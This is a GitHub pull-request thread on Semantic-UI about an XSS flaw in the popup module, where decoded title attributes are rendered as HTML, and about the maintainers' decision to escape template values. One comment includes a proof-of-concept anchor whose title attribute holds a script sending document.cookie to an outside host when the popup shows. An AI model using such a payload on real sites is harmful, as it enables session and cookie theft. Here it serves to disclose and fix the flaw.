-
Notifications
You must be signed in to change notification settings - Fork 5k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
[Modules] All module templates should escape unsafe values #1033
Conversation
|
I cannot see XSS here... On Sun, Aug 24, 2014 at 2:48 AM, Denis Rechkunov notifications@github.com
|
|
Really? I thought my example is very obvious. Ok, here is such example. Craft XSS link: <a href="/some/link" class="popup" title="<script>$.get('http://google.com', {data: document.cookie})</script>">Link</a>Enable popup for this link: $('.popup').popup()And now when you hover this link by mouse cursor your cookies will be sent to google.com. |
|
This is not a xss... a xss is only valid if you can send a url link (direct
|
|
In this case link title is a user-generated content that was properly encoded at server-side. One more time: link title has encoded value that should be safe for any browser-side rendering logic. And popup should use it safely, but it does not. |
|
I agree. If the ability to use arbitrary html in these is important, there should be an explicit option (data-title-html, for example). Otherwise it's assumed that title will be applied as text. @KabluBR XSS vulnerabilities can occur any time users impact what's is inserted into a page – server side or client side. It doesn't matter where the content comes from. |
|
I understand your problem, just want to be clear that this is not the |
|
Frankie, In the case you have users creating dynamic code do TITLE properties you I am not saying that it cannot also be handled by client side scripts, but http://en.wikipedia.org/wiki/Cross-site_scripting So if you have any js lib that encode any decoded html, you can simply Anyway you can change client script to match your needs too... On Sun, Aug 24, 2014 at 2:34 PM, Frankie Bagnardi notifications@github.com
|
|
No need for ad hominem. All comments here were done in good faith. Calling someone's misunderstanding of your technical perspective sad doesn't help resolve an issue, or contribute to the discussion. There is no single attack vector for XSS, and it can be very complicated to handle all possible variations. In general protecting against XSS boils down to some form of string replacement, which can be done anywhere. Rather than try to solve for all possible XSS possibilities in a JS/CSS framework, it's my belief it is better to solve these encoding issues server side. I appreciate your contribution, and I encourage you to continue to submit pull requests if you see other issues when implementing SUI. |
|
Nobody cares that special chars are removed from title in my example? Please read again all my examples: special chars like Please could you provide an example how can I output such text in popup? I am sure there is no such example, because even encoded HTML with safe replacements from server will be decoded back to HTML by SUI and I see just a rendered link in popup. |
|
Hi all, sorry Pragmadash if I did look like I was discussing in a bad way. I just wanted to extend this issue as I already faced it many and many times, to know if it was really an client problem. Anyway, I just tested it and in my browser it does not show the issue you have there. . |
|
@KabluBR Please generate the same title value at server-side not just setting via jQuery. |
|
There is an example on jsFiddle http://jsfiddle.net/pragmadash/0o3p4ghm/11/ that demonstrates situation with title attribute rendered at server-side with replacements |
|
@pragmadash they're saying you should double escape it. Not escaped: Escaped: Double escaped:
Exactly, you don't want to fix problems, but you really really don't want to be the cause of them. |
|
Alright, I'll cut this discussion short. The total cost of escaping html is a few bytes larger files over-the-wire, there's no harm in including it. JS Templating libraries appear to do this by default as a safeguard against xss. If your curious, here's Handlebar's exact implementation I'm going to include this in the @pragmadash You can also specify your own popup, so you don't have to deal with javascript construction at all. Its much faster, and avoids issues with unsafe content. See this JSfiddle. You can also use this method to specify complex popup content, like adding grids inside of a popup for a wide dropdown menu. |
|
Added escaped parameters as part of settings object, can overwrite with a custom function if necessary. See commit for more $.fn.popup.settings.templates.escape = function() {
// my custom escape function
}; |


Hello, everyone!
We use this awesome Semantic-UI library at our project http://konfettin.ru.
Thanks a lot for your work!
We faced such problem as XSS vulnerability in popups.
For example, we have such element:
If this element is used with Semantic-UI popup module and popup is shown you see alert. The problem is when you get attribute value with
$('selector').attr('title')it returns decoded HTML and it is not safe to use it without any processing.I've found in popup docs here that for exacly HTML output in popup
data-htmlproperty should be used otherwise any developer expects to see safe encoded text.